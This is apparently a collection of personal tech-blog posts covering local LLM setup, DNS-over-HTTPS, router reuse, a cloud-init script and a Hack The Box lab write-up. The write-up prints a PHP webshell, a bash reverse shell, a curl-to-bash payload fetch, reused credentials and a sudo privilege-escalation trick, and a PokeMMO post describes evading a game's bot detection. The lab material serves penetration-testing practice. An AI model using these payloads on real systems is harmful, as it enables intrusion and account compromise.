In a previous post, I discussed setting up a local environment to run language models on your own machine (Read the original post).
Well, I have to admit today that I’ve concluded that while LMStudio has its merits, it doesn’t fully align with my principles. Consequently, I’ve decided to transition to Ollama and refresh my setup to embrace the recent hype surrounding the Chinese model trained with synthetic data based on ChatGPT responses. (FTW: Work smarter, not harder! :D)

Installing Ollama

Installing Ollama is straightforward. While compiling the project locally might be challenging for some, pre-built release builds are available on the official website: ollama.com. Once downloaded and installed, you can use the command-line interface (CLI) to download and run models easily.

Available DeepSeek R1 Models

Here is a table summarizing the currently available DeepSeek R1 models:

Selecting the Right Model

Selecting the appropriate model depends on your hardware. Here’s a table to help you decide:

Notes:

• The VRAM requirements are approximate and can vary based on specific configurations and quantization techniques.

• Quantization methods can reduce VRAM usage. For instance, a 1.58-bit quantized version of the DeepSeek-R1 model can fit into 160 GB of VRAM, allowing it to run on two NVIDIA H100 80GB GPUs. (unsloth.ai)

• For CPU-based inference without a GPU, it’s possible to run certain quantized versions of the model with as little as 20 GB of RAM, though performance may be slower. (unsloth.ai)

When selecting a model, ensure that your hardware meets the necessary requirements to achieve optimal performance.

Downloading and Running the Model

To download and run a model using Ollama, follow these steps:

1. Start Ollama: After installation, Ollama will run in the background without displaying any visible interface.

2. Download the Model: Open a terminal and execute the following command to download the desired model:

   ollama pull deepseek-r1:7b

   This command will download the latest version of the deepseek-r1:7b model.

   

3. Serve the Model: Once downloaded, run the following command to expose the model on your local machine:

   ollama serve

   By default, the model will be accessible at http://localhost:11434. Additionally, after pulling a new model,the server will automatically restart to apply the changes, meaning that it will start automatically the first time we pull!

Models I Downloaded

I also downloaded a few additional models to expand my local setup. Here’s the list of models I have installed on Ollama:

ollama ls

Integrating with Continue Extension

To integrate the model with your development environment, you can use the Continue extension. After installation, update the config.json file to include the models you’ve downloaded.

Path to config.json

• macOS and Linux: ~/.continue/config.json
• Windows: %USERPROFILE%\.continue\config.json

Sample config.json

Here’s an example of what the configuration file might look like:

{
  "allowAnonymousTelemetry": false,
  "models": [
    {
      "title": "DeepSeek-R1 7B",
      "provider": "ollama",
      "model": "deepseek-r1:7b"
    },
    {
      "title": "LLAMA 3.2B",
      "provider": "ollama",
      "model": "llama3.2:3b"
    }
  ],
  "tabAutocompleteModel": {
    "title": "Qwen2.5-Coder 3B",
    "provider": "ollama",
    "model": "qwen2.5-coder:3b"
  },
  "embeddingsProvider": {
    "provider": "ollama",
    "model": "nomic-embed-text"
  },
  "contextProviders": [
    {
      "name": "code",
      "params": {}
    },
    {
      "name": "docs",
      "params": {}
    },
    {
      "name": "diff",
      "params": {}
    },
    {
      "name": "terminal",
      "params": {}
    },
    {
      "name": "problems",
      "params": {}
    },
    {
      "name": "folder",
      "params": {}
    },
    {
      "name": "codebase",
      "params": {}
    }
  ],
  "slashCommands": [
    {
      "name": "share",
      "description": "Export the current chat session to markdown"
    },
    {
      "name": "cmd",
      "description": "Generate a shell command"
    },
    {
      "name": "commit",
      "description": "Generate a git commit message"
    }
  ]
}

Save the file, and you’re ready to generate code!

Note: If you really care like me, don’t forget to disable the Anonymous Telemetry (For additional details: docs.continue.dev); also it’s worth nothing that Ollama adds itself to the startup processes by default… if you prefer to prevent this behaviour, make sure to disable it.

Happy hacking!

Contacts

For questions or suggestions, contact: noc@balzabu.io.

Nonetheless, I have never stopped tackling all sorts of problems! :D
In fact, I recently dealt with a rather tricky issue that friends and family pointed out to me, and I decided to explore it further.

The Problem

Recently, some of the largest Italian ISPs have begun enforcing DNS traffic rules.
This is most likely related to the crackdown on illegal content streaming, but it also opens up an interesting discussion about user security.

The main risk is that by forcing users to use their DNS servers, ISPs can monitor and log all DNS requests. This means they can track which websites are visited, creating a detailed profile of users’ browsing habits.

Additionally, this practice could expose users to potential DNS traffic manipulations, such as redirection to malicious sites or selective blocking of certain online resources not hosting malicious contents.
Another critical aspect is that ISPs could use this information for commercial purposes or share it with third parties, further compromising user privacy.

Technical Dive-In

With patience, I decided to conduct a series of in-depth tests to verify this claim. I configured various public DNS services (including Google DNS, Cloudflare, and OpenDNS) on two routers from different ISPs and monitored the DNS traffic. The results were unequivocal: despite the DNS settings configured on the router, all DNS requests were systematically redirected to the ISP’s DNS servers.

I conducted further tests on a ZTE router provided by a major Italian ISP. Even though the official manual clearly indicated an “ISP DNS” option that could be disabled to use custom DNS, after disabling this option, the router continued to ignore the custom DNS settings.

The Solution: DNS-over-HTTPS (DoH)

After various attempts, the solution turned out to be the use of DNS-over-HTTPS (DoH). This technology represents a significant evolution over traditional DNS as it encapsulates DNS requests within the HTTPS protocol.

The working principle is simple but effective: instead of sending DNS requests in plain text over port 53 (which can be easily intercepted and modified by the ISP), DoH uses the HTTPS protocol on port 443. Since HTTPS traffic is encrypted, the ISP cannot read or modify DNS requests, making forced redirection to their servers impossible.

In practice, when a browser or application configured to use DoH needs to resolve a domain name, it sends an HTTPS request to a DoH server (such as those from Cloudflare or Google). The server responds with the requested IP address, all through a secure and encrypted connection.

This method is particularly effective because, although the ISP can see that we are communicating with an HTTPS server, it cannot determine which DNS requests we are making or alter them.

Comparison with Traditional DNS

To better understand the difference, let’s look at how traditional DNS works compared to DoH. In traditional DNS, requests are sent in plain text, which means anyone on the network path, including ISPs, can see and potentially manipulate them.

In contrast, DoH encrypts the requests, ensuring that only the intended DoH server can decode them. This encryption prevents ISPs and other intermediaries from viewing or altering the DNS traffic.

By adopting DoH, users can significantly enhance their privacy and security, bypassing ISP content blocking and preventing potential DNS manipulations.

Contacts

For questions or suggestions, contact: noc@balzabu.io.

Updated on 2025-01-29

I stopped using LM Studio and switched over Ollama. You can read the shiny and brand new post here: Ollama + Continue: Open-Source is Always Better!

The realm of technology is constantly in the pursuit of innovation. Among the latest advancements, LM (Language Model) tools have revolutionized programming, making tasks seemingly effortless. But why shell out for them when these capabilities can be accessed for free? Discover LM Studio and Continue, which offer a local solution with unparalleled advantages.

The Advantages of Local LM Models

Embracing a local LM model comes with a host of benefits:

• Cost-free: No subscription fees; use it at no extra cost.
• Complete Offline Access: Work seamlessly even without an internet connection.
• Full Prompt Control: Customize prompts to tailor results to your exact needs.

Of course, it’s essential to weigh the drawbacks alongside the perks:

• Hardware Requirements: Consider the computing power needed to run these models effectively.
• Model Variability: Not all models are created in the same way; some may lack the sophistication of their proprietary counterparts.

LM Studio Configuration

Configuring LM Studio is a breeze.
Begin by downloading a preferred build from the official LM Studio website lmstudio.ai.
After installation, launch the application manually to access the Home screen.

Utilize the search bar at the center of the Home screen to locate desired models.
To make it all easier, Meta’s Code LLama model is recommended.

Searching for Code LLama will yield various results, as LM Studio can search and download available models from platforms like Hugging Face.

Each model offers different quantizations to compress its size.
Always verify model details on Hugging Face before selecting based on your hardware.
In this case, we’ll use the Code LLama 13B model.

Once downloaded, navigate to the AI Chat section of LM Studio to load the model. Additionally, LM Studio can be configured to use it as a server.

Choosing the right model is crucial, considering hardware capabilities. Opt for a model that runs smoothly on your system to avoid performance issues.

As you can see from my screenshot, it’s possible to configure LM Studio to offload operations to the GPU, though optimal settings may vary. Experiment with different configurations to find the most efficient setup for your hardware. Remember that LM Studio will run on 4 CPU cores by default.

After configuring parameters, start the Local Server via the “Local Server” section of LM Studio. Specify a port and other parameters, but note that changing the default port may cause issues with the Visual Studio Code extension we’ll use later.

Visual Studio Code Configuration

With a local model ready and waiting, it’s time to connect using the open-source Continue extension in Visual Studio Code.

After installation, configure the extension to use your LM Studio server by editing the config.json file. This file is typically found at:

• Windows: C:/Users/{user}/.continue/config.json
• Linux/Mac: ~/.continue/config.json

Add your local model to the models array, ensuring to include title, provider, and model parameters.
Set allowAnonymousTelemetry to false.

Save the file, and you’re ready to generate code locally in Visual Studio Code using your LM Studio model!

For a comprehensive understanding of the extension’s features, refer to the official project wiki here.

Conclusion

Wrapping up our dive into LM Studio and Continue, we’ve found a whole new way to rock coding without breaking the bank. These local models give you all the power without any subscription fees. And with easy setup in Visual Studio Code, you’re ready to roll.

So, let’s get coding!

Contacts

For questions or suggestions, contact: noc@balzabu.io.

Introduction

Managing cloud infrastructure often involves dealing with various initialization and configuration tasks. For Ubuntu servers, the cloud-init package plays a crucial role in handling these tasks during the instance boot process. However, there may be scenarios where you want to disable cloud-init for specific use cases or configurations.

To simplify this process, I’ve created a Bash script called disable-cloud-init. This script automates the task of disabling cloud-init on Ubuntu servers in a non-interactive manner, streamlining the configuration process.

Features

• Automation: The script automates the process of disabling cloud-init, saving time and effort.
• Non-Interactive: Designed to be run in a non-interactive environment, so you won’t have to specify or do anything.
• Based on Gist: The script is based on this Gist, providing a reliable foundation.

Usage

Prerequisites

Before using the script, ensure:

• You are using an Ubuntu server.
• You have the necessary privileges (root access) to execute the script.

Running the Script

Execute the following one-liner in your terminal to run the script:

bash -c "$(curl -fsSL https://raw.githubusercontent.com/balzabu/disable-cloud-init/main/disable-cloud-init.sh)"

Note: after running the script, consider performing a manual reboot to ensure that the changes take effect.

Conclusion

Feel free to check out the project on GitHub and give it a try on your Ubuntu servers. Your feedback and contributions are highly appreciated!

Happy scripting!

Contacts

For questions or suggestions, contact: noc@balzabu.io.

It provides access to a variety of vulnerable labs that are regularly updated; these labs offer a mix of realistic scenarios and Capture The Flag (CTF) challenges.

I have decided to start publishing some of my Hack The Box writeups as I solve them. It’s a fun and educational way for me to learn new things in the field of penetration testing.

In this blog post, I will be discussing the machine Devvortex.

Devvortex Machine Specifications

• Operating System: Linux
• Difficulty: Easy
• Target IP Address: 10.10.11.242

Basic Enumeration

Firstly, as usual, I added the Target IP Address to my /etc/hosts file to assign a local domain name for it.

$ sudo nano /etc/hosts

After assigning the local domain name for the Target IP Address, I proceeded with a thorough port scan using Nmap to identify any open ports and services running on the machine.

nmap -p- -sV -T4 --max-retries 3 devvortex.htb

Based on the scan results, I discovered that ports 22 (SSH) and 80 (HTTP) were open. This indicated that there might be potential entry points through these services that I could explore further.

Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)

The website utilizes nginx and its content appears to be associated with a development company.

However, it does not utilize HTTPS.

Upon inspecting the source code of the page, we can observe that the website has been constructed using HTML and jQuery.

Certain content is accessible within the following directories: css/,images/,js/.

We cannot list the content of these or any other directory because Directory Indexing is disabled, resulting in a 403 Forbidden error being displayed when accessing them.

Gobuster Directory Enumeration for Web Content

In order to comprehensively explore the web content of the Devvortex machine, I employed Gobuster—an effective tool for directory and file enumeration.

Despite the website not exhibiting PHP capabilities, I opted to include a scan for this extension as part of the enumeration process, aiming to identify any potentially intriguing files.

$ gobuster dir -u http://devvortex.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,php3,html

However, the directory enumeration concluded without revealing any noteworthy files or directories.

DNS Enumeration for Subdomains

After encountering unremarkable results from Gobuster, I decided to explore alternative avenues. Turning to DNS enumeration became the next logical step to investigate potential subdomains associated with the target.

$ gobuster dns -d devvortex.htb -w /usr/share/wordlists/amass/subdomains-top1mil-20000.txt

To my satisfaction, this approach yielded results!

Found: dev.devvortex.htb
Found: piwik.devvortex.htb

Upon discovering these two domain names, I promptly added both to my /etc/hosts file. Subsequently, visiting these domains allowed me to inspect their content for further insights.

Joomla Enumeration and Version Discovery

Upon investigating the subdomains, it was observed that the piwik.devvortex.htb domain redirects to devvortex.htb. However, the dev.devvortex.htb domain reveals another website.

Analyzing the source code of it, no Powered by text is found.
Nevertheless, the theme name hints at the possibility of it being a Joomla website. This suspicion is confirmed by checking the robots.txt file.

Joomla Version Enumeration

The next step involves determining the Joomla version to identify potential vulnerabilities. Accessing the /administrator directory yields a login page. However, this path can be utilized for further enumeration.

The presence of the joomla.xml file in the path /administrator/manifests/files/joomla.xml provides additional details about the Joomla version running on the server.

Exploiting Joomla CVE-2023-23752

Upon identifying the Joomla version as 4.2.6, further exploration reveals an interesting CVE (CVE-2023-23752) that could be exploited for Code Execution on the target host. The details of this CVE can be found at Joomla Security Centre.

The vulnerability allows access to JSON data containing MySQL database credentials.

{"type":"application","id":"224","attributes":{"user":"lewis","id":224}},{"type":"application","id":"224","attributes":{"password":"P4ntherg0t1n5r3c0n##","id":224}}

While initially meant for MySQL database access, luck is on our side—the sysadmin’s password reuse allows us to log in to the Joomla administrator dashboard.

Once inside, we can leverage this access to explore further vulnerabilities and escalate privileges. Consideration is given to searching for additional exploits or misconfigurations within the Joomla environment to advance the exploitation process.

Exploiting Joomla for Command Execution

After successfully identifying and exploiting the Joomla vulnerability (CVE-2023-23752) to gain access to the Joomla administrator dashboard, the next step involves attempting to achieve command execution on the target system.

Injecting Malicious PHP Code

An initial attempt is made to inject malicious PHP code into the cassiopeia template’s index.php file using the following one-liner:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

However, it is observed that the index.php file is write-protected, hindering the direct injection approach.

Uploading a Malicious Joomla Extension

As an alternative, a malicious Joomla extension is uploaded to the website. The chosen extension is the one developed by @p0dalirius, available at Joomla-webshell-plugin. Following the instructions provided in the GitHub repository, the extension is successfully installed, providing a web shell for command execution.

Command Execution with CURL

Using CURL, commands can be executed through the web shell. The following command is an example of retrieving system information:

$ curl -X POST 'dev.devvortex.htb/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\\n","stderr":"","exec":"id"}

The successful execution is evident, establishing a connection as the user www-data.

Interactive Console for Shell Access

To further escalate privileges, an Interactive Console provided by the installed malicious extension is utilized. The console.py file from the repository facilitates obtaining a shell.

Using this console, exploration reveals the location of the user.txt flag inside /home/logan/.

However, access to this file is restricted.

User Enumeration with /etc/passwd

Attempting to identify additional users, the contents of the /etc/passwd file are downloaded. Unfortunately, no other users are discovered at this point in the exploration. The focus now shifts towards finding a pathway to escalate privileges and eventually gain root access.

Escalating to a Real Shell and Database Enumeration

Expressing dissatisfaction with the Interactive Shell, an alternative approach is adopted to spawn a more conventional shell.

Creating a Shell Script for Reverse Shell

An .sh file is crafted to execute the desired commands. The contents of this file aim to establish a reverse shell connection:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.89/9999 0>&1

This shell script is designed to initiate a reverse shell connection back to the specified IP address (10.10.14.89) and port (9999).

Executing the Shell Script

To execute the shell script on the target system, a PHP Development Server is initiated. The target downloads and executes the script, connecting back to a netcat listener:

curl http://10.10.14.89:9999/balzabu_reverse.sh | bash

In this command, the shell script is retrieved using curl and immediately piped to bash for execution. This process effectively establishes a reverse shell connection from the target to the specified listener.

The process and successful connection are depicted in the following image.

Accessing MySQL CLI with Successfully Obtained Credentials

With the credentials obtained during the Joomla exploitation proving valid, access to the MySQL command-line interface (CLI) is established through our new shell.

$ mysql -ulewis -pP4ntherg0t1n5r3c0n## -h localhost -D joomla

Database Enumeration: Joomla Users

Within the joomla database, exploration reveals the existence of the sd4fg_users table. Dumping its contents provides valuable user information:

SELECT * FROM sd4fg_users;

In the user table, the presence of the confirmed user logan is reaffirmed:

650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |

Observing the hashed password, it is inferred that bcrypt/blowfish algorithms were likely employed for encryption.

Cracking Password Hash and SSH Access

With the hashed password in hand, the next step involves attempting to crack it using hashcat. The hash is stored in a file named hash which contains the previously obtained result:

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' >> hash

The cracking process is initiated using the following hashcat command:

sudo hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt

The result of the cracking endeavor is successfully captured in the image:

Now armed with the cracked password, the journey advances towards SSH access. The credentials are utilized to log in as the user logan:

ssh logan@devvortex.htb

Upon successful authentication, access to the ’logan’ account is granted:

Subsequently, the user flag is retrieved from the home directory:

logan@devvortex:~$ cat user.txt
53ea1d7ae33dbd77cda0be21f4cfed7e

With user privileges secured, the focus shifts towards the ultimate goal— escalating to root and achieving full control over the system. The journey continues with an exploration of potential vulnerabilities and exploitation vectors.

Root Privilege Escalation: Exploiting CVE-2023-1326

To proceed with privilege escalation, an initial step involves enumerating the Linux kernel:

logan@devvortex:~$ (cat /proc/version || uname -a) 2>/dev/null

Linux version 5.4.0-167-generic (buildd@lcy02-amd64-010) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023

The examination reveals no apparent kernel exploits, prompting a shift towards inspecting services and binaries on the server.

Identifying Root Execution Capability

Exploring potential commands executable with root privileges, the apport-cli command stands out as the only addition.

Exploiting CVE-2023-1326

Upon discovering the presence of apport-cli, further investigation unveils a privilege escalation vulnerability—CVE-2023-1326, similar to CVE-2023-26604. The details of this CVE can be found at National Vulnerability Database.

Exploitation Steps:

1. Create a Report File:

   Execute the following command to generate a report file:

   apport-cli -f

   

2. Copy Report File:

   Move the generated report file from /tmp to /var/crash:

   sudo mv /tmp/some_crash_file.crash /var/crash/

3. Exploit CVE-2023-1326:

   Initiate the exploit by executing the following command:

   sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash

   Press V to view the report, and once loaded, enter the following command in a manner similar to invoking a shell in vim:

   !/bin/bash

   

4. Achieving Root Access:

   The successful execution of the above steps results in obtaining root access:

   

Root Flag Retrieval

Having escalated privileges to root, the final step involves retrieving the root flag from /root/root.txt:

cat /root/root.txt
81df009efcd837a749211c494bfbb3e9

With this, the machine is totally compromised marking the completion of the penetration testing journey on the Devvortex system.

Contacts

For questions or suggestions, contact: noc@balzabu.io.

The overall experience has been awesome, I fell in love with this framework.
The simplicity and the fact that it’s cross-platform by default really are an advantage in the long run.
To be honest I never thought, before this moment, I could code a Mobile APP this easily ( Considering I had a minor experience only with Kotlin, which is way more complex and messy ).

However, during the initial phases I had to test various layouts and components to make sure they would work like I intended. As most of the programmers I know, we all get the ideas while we’re doing something else and I had a few occasions where I wanted to test a thing but I couldn’t due to the lack of a well-made IDE for Mobile.

Yeah, you heard right, all the online IDEs for React-Native suck… here’s why:

• They won’t allow you to use built-in Android functions on the sourcecode ( Say bye-bye to “Select All” or “Copy/Paste” ).
• They all have some kind of resizing/scaling issue, even when browsing it with a Windows UA, forcing the page to be loaded like it would on a computer.

So I had to find a solution which in the end was pretty straightforward.

The Life Hack

In the end I found out that the best mobile IDE is called “Snack”, made by the developers of Expo.
It allows you to write the code and execute it on various devices (Including your own) !

Despite being pretty good on computer, I’ve noticed how it has the same issues I’ve pointed previously, so I was scratching my head searching for a solution.

A much thought, I found out that the “Learn the Basics” docs from the reactnative.dev website has a custom built-in “Snack” IDE!

I just fell in love with it, it doesn’t have any of the issues I said before and can even skip the waitlist when you build the code.

So, if you’re looking for a Mobile IDE that just WORKS… just use the one available in the official React Native documentations here: reactnative.dev (Remember to request desktop website, else the website will tell you to install the Expo GO app).

Contacts

For questions or suggestions, contact: noc@balzabu.io.

Updated on 2023-12-07

Note to self: never host your images on external services.

You recently changed ISP or upgraded your connection to an FTTH and now you have an extra Vodafone Power Station laying around, don’t you?

Don’t throw it in the trash! Instead, use it as an Access Point by following the guide below!

Your pockets will thank you!

Requirements

I’m going to refer to the Vodafone Power Station as VS.

1. Vodafone Power Station
2. Laptop or Smartphone
3. A LAN cable running from your current router to the area where you want to place your VS.
4. Web-UI credentials that can be found on the bottom side of the VS
5. A working brain

1. Factory Reset

Before going on with the guide, it’s important to check if the VS is configured or not. If it was previously used, it’s highly suggested that you’ll have to perform a Factory Reset to avoid any kind of issue.

There are two ways to perform a Factory Reset, you can choose the one you prefer:

• By pressing the reset button on the back of your VS for a few seconds.
• Through the VS Web-UI interface.

Reset Button

If you want to reset your VS through the physical button, you simply need to press it using a needle for a few seconds.
Once all the LEDs light up, you can release it and wait for the process to finish in a few minutes.

Web-UI

If you want to reset your VS through the Web-UI, you need to connect to the router first.

After connecting, even if you can’t browse the internet, you will be able to access the router (we can also refer to it as “gateway”) Web-UI.

To access the gateway, we should first check which subnet the VS is currently using; generally, after a Factory Reset, the default subnet should always be “192.168.1.0/24”, but checking it is fairly easy, so I highly suggest not to skip this part.

So, in case you don’t remember the address of your VS or you want to reset it, you can:

• Windows

  • Open “Command Prompt” or “Powershell” [ Need help? Click HERE ]
  • Type “ipconfig” and press enter.
  • Your Subnet / Gateway IP will be shown on the corresponding interface.

• Linux

  • Do I really need to tell you this?

• Android

  • As you would on Linux if you use APPs like Termux, or you simply check the assigned addresses by looking at the options that appear once you’re connected to a Wi-Fi network and click on it.
    
    

Once you’ve got the gateway address, you can then access it through any browser.
If we suppose that the Gateway IP is 192.168.1.1, the address will be: https://192.168.1.1/

P.S: If you see any HTTPS errors, you can safely skip them. These are mostly due to self-signed HTTPS certificates being used.

Then, the router will ask for a username and a password, that you should already have, as requested in the Requirements.
After entering the credentials, you can finally log in.

You can find a button to perform the Factory Reset within the “Settings” options.

After clicking the button and confirming, the router will start blinking. Wait (up to 5 minutes) for the process to end and then start finding your gateway address again, this time you will actually be able to configure it as an access point.

2. IP Settings

Before going on by adding the “General Router” features, you should first change the gateway subnet to something else if it matches the one you used in your original router (the one that will provide the connection).

Any conflict won’t let both routers work, so be careful.

In my case, I’ve decided to set the VS to use the 192.168.10.0/24 subnet and connect it to the main router through DHCP.
In this way, my main router will manage everything.

To set your subnet, you need to set your Mode to “Advanced User” using the options available in the upper right corner. After enabling this functionality, you will see many new options appearing in the interface.

You can set your preferred address through Settings -> IPv4.

Always check that the local DHCP pool also gets updated.

You can then click the “Apply” button.

3. Wi-Fi Settings

You can now change the Wi-Fi name and password. Due to this configuration not being “mesh”, our original Wi-Fi network and the AP need to have different SSIDs. To change your Wi-Fi settings, you can browse the Wi-Fi tab of your gateway. Edit it according to your needs. :)

4. Generic Router mode

After the setup of your custom subnet and Wi-Fi settings, you can now apply the most important option.

The VS itself provides a way to use it as a “generic router” by supplying an internet connection through the WAN port.

In order to edit this option, you need, to be in “Advanced User” mode, as we did in IP Settings.

Once you enabled it, you can access the “Generic Router” settings through Settings → Generic Router.

Here, configure the WAN port depending on whether the original router is ADSL or fiber.

In my case, I added a “WAN FIBER” option and gave it the following options:

1. Used for: Data
2. Connection Type: DHCP

After clicking the Save button, everything is done.

You will be able to browse the internet without any problems just by connecting the LAN cable, coming from our original router, to the WAN port of the VS.

Enjoy your new access point!

Contacts

For questions or suggestions, contact:noc@balzabu.io.

Updated on 2023-12-07

A few weeks after this article has been posted, as a strange coincidence, there has been an huge update which changed how the detection works on Android devices.

It might be bypassable using the same package name as apps that use Accessibility Service by default on some devices, however this should be investigated.

As every nerd I know, during my free time, I love playing videogames and I’ve recently decided to play Pokèmon again, focusing on the old generations. It feels like a real throwback to my childhood!

During the setup of the emulators, I’ve discovered the existence of PokeMMO.

What’s PokeMMO?

PokeMMO is a cross-platform^[1] MMO, created in August 2012, where it’s possible to play most of the Pokèmon games (Red Fire, Emerald, Platinum, Black/White, HG/SS) with thousands of players connected at the same time. It’s possible to trade items and Pokèmon, challenge other players or even sell in-game items through a system created by the developers called GTL ( Global Trade Link ); For all intents and purposes, it’s an international market based on the In-game currency, the PokeYEN, where all the players can sell or buy everything.

Since it makes use of the original Pokèmon ROMs, the storyline and the NPC interactions are not modified. The story is the same as the original game, it only implements specific differences such as:

• Change of the spawn location of wild Pokèmon
• Legendary Pokèmon can't be caught or kept for long time^[2]
• The battles against the NPCs are way harder

*^[1] The game is currently supported on Windows, Android, iOS, Mac and Linux.

*^[2] Currently the only legendary Pokèmon that can be caught and kept permanently in the game are: Suicine, Raikou ed Entei.

How does it work?

As already stated, at the beginning the game does not show any substantial difference except for the dialogs speed which is increased to allow a smoother experience. Once the 4^th gym has been defeated, it will be possible to use the GTL trading system mentioned in the previous section.

Arrived at this point, it immediately becomes clear that the price of some items listed in the GTL, not only requires to set up a strong team that is able to compete in the PvP aspect of the game but is also really high and requires more and more PokeYENs.

There are different ways to “farm” the PokeYENs, but all of them are inefficient if we compare them to the selling price of the most useful items and Pokèmon, therefore it was immediately clear to me that I needed to find a method to gain large amounts of PokeYENs with the minimum effort necessary and, above all, for free. Always keep in mind that the difficulties to face when creating the automation are as many as the interactions in the game.

My research lasted about 1 week, during which I read and studied the various documents and posts available on the official PokeMMO forum.

In the end I found the Holy Graal: Shiny Hunting!

Shiny?!

Shiny Pokèmon, introduced from the II generation of the game, are just different sprites of the same Pokèmon you would usually catch; generally they are recognized because when they join a battle they are “wrapped” in flash or stars.

It’s good to remember that a normal Pokèmon can’t become Shiny, just as a Shiny Pokèmon can never become a normal Pokèmon.

What makes them so special? They are hard to obtain.

The spawn rate of these entities is of 1/30000 for each encounter. Obviously, previous encounters don’t influence in any way the spawn rate: the chance that a Pokèmon Shiny appears will always be the same even if you already met the “classic” version thousands and thousands of times. In this case players generally aim for the Hordes Pokèmon.

A horde is a group of three or five wild Pokémon battled simultaneously in PokeMMO.

While walking and surfing in locations with hordes, players sometimes encounter a horde instead of a single wild Pokémon. Pokè Balls cannot be used in horde battles until only one member of the horde remains.

It’s common, during an “hunt”, to reach a really high number of encounters; On average, it’s estimated that a Shiny occurs between 18000 and 30000 encounters. Obviously, there is no way to determine the exact number of encounters required; many players have been looking for the Shiny version of their favorite Pokèmon even for YEARS , also due to the high cost of the specific methods required to find them such as Egg Breeding.

There are items and ranks, such as Shiny Charms (Used in-game, lasts 1 hour) and Donator Rank (Rank obtained for 7/15/31 days after making a donation with IRL money), that are able to decrease the spawn rate and therefore granting more chances to get a Shiny.

Below the affected spawn rates:

All the items and ranks can be bought paying by IRL money or in-game PokeYENs. It is obvious that the price in PokeYEN is high and, therefore, unattainable for novices unless you play for dozens and dozens of hours using other farming methods such as Gym Rebattles, PayDay or the ever-green Flipping_[1] of the Items/Pokèmon on the GTL.

*^[1] “Flipping” means buying something to resell at an higher price in order to make a profit.

Many people spontaneously decide to “hunt” these particular Pokèmon because they are the most expensive and sought after in the game economy.

A single Shiny, depending on the IVs (In-game stats such as Attack Speed, Damage, etc.) can be sold from a base price of 800000 up to 1999999999 PokeYENs! Catching a single Shiny can be game-breaking, because if sold it could yield a return of a large amount of money to the player, who can reinvest.

For additional information: PokeMMO Shiny Hunting Guide

Automating the hunting process

Once I’ve understood which is the most profitable (and hard) way to get PokeYENs, I’ve decided to get my hands dirty.

It’s easy to see that many players have tried to study, comprehend and find the best method to automate the process of hunting this kind of Pokèmon, or at least reduce the number of manual interactions required. Most of the bot implementations I’ve seen are aimed towards the Windows version of the game, automating the movements of the characters with specific macros.

What’s a macro? A macro is simply a group of procedures that are executed on the system automatically when specific triggers are respected. It’s able to interact within the game as a real player would, simulating the clicks of the keyboard and the movement of the mouse.

A macro can be easily written through tools such as AutoHotkey or some Python modules: pyautogui and pynput.

However, as found by the user pnqphong95 on his GitHub repository Pokemon-MMORPG-Bot, the admins were able to suss him out before he could finish catching the Pokèmon for his team.

His account was perma-banned.

The game’s moderators take the bot issue very seriously, and will promptly reject any un-ban request, as seen from several posts made by other players on their official forum: Ban Notice. Furthermore, while the game is running, there seems to be regular checks on the player to grant it’s authenticity.

Actually, during my tests, I’ve also noticed some anomalies that could be somehow related to the ban that the previously mentioned player received. Without any kind of Reverse Engineering, I’ve observed:

• Sudden movements of the player in other positions
• Input-lag after a high amount of interactions

It is clear that these hypothesis should be studied in depth, in order to determine their relevance in the detection mechanism of the game(if it exists). However, it seems safe to assume that the the Windows version has additional controls in place that effectively prevent/limit the use of these bots or report their anomalous behavior to the administrators, who manually verify everything.

The duration of the game session must also be considered because the game has implemented a mechanism of automatic disconnection from the server: the player will get disconnected if there doesn’t seem to be any kind of action for more than 10/15 minutes. Bots are usually connected for dozens of hours, if not days, so there’s probably a system that allows them to “list” all the sessions and order them by their length, banning on-sight any session that has an unexplained length.

They’ve also implemented a reCAPTCHA mechanism that gets suddenly displayed and it could be their latest verification method to establish if a player is “botting” or not.

So what now? Shall we forget about this project and start to waste countless hours of our lives to catch one of these Pokèmon? Absolutely no!

As a wise man said:

Success is not final; failure is not fatal: it is the courage to continue that counts

– Winston Churchill

What about the Android APP?

Excluding Windows, I had no other options except checking the Android port too. Although it looks virtually identical, I believe that the detection systems work differently for this version. Usually, when designing a cross-platform application in Java, the application itself is split into as many projects as the supported platforms, with the addition of a Java library for the core functionalities, where most of the work is generally done. For instance, in order to make our application running on Windows and Android, we should have:

1. A project for Android-specific features
2. A project for Windows-specific functionalities
3. A Java library shared between the first two projects, containing many of the essential features of the application.

Therefore, it is easy to assume that in the Android project, although many aspects are the same, the detection mechanisms changes.

Implementation of macros on Android

Well, after choosing our platform, it is time to start automating!

After some consideration, I have decided not to share my solution in a step-by-step way. I am convinced that the massive use of these tools by the players would be able to inflate the economy of the GTL, thus destroying the very meaning of the game.

I will therefore just give general information, and also attach a demonstration video.

Image Recognition

The technology I’ve used is Image Recognition, by which it is possible to search for specific images on the current screen of the device and then run macros.

By searching for items present only at specific times, it is possible to create automatic interactions that are not looped, thus generating many server-side errors, but only when certain conditions are met.

An example of the elements I was looking for:

1. The error message "There's no PP left for this move"
   • Used as a trigger to teleport to a Pokèmon center and then return to the previous spot.
2. The move "Sweet Scent" icon, inserted into the game hotbar.
   • Used as a trigger to start an encounter with a horde
3. NAME+LEVEL+HEALTH BOXES of the single encounter Pokèmon
   • Used as a trigger to escape from the fight with Pokèmon we do not seek.
4. NAME+LEVEL+HEALTH BOXES of the horde encounter Pokèmon
   • Used as a trigger to automatically escape from hordes that do not contain the Shiny Pokèmon we are looking for.
5. Player positions in the interested area
   • Used as triggers to take the character to specific places on the map, thus detecting wrong movements and fixing them.

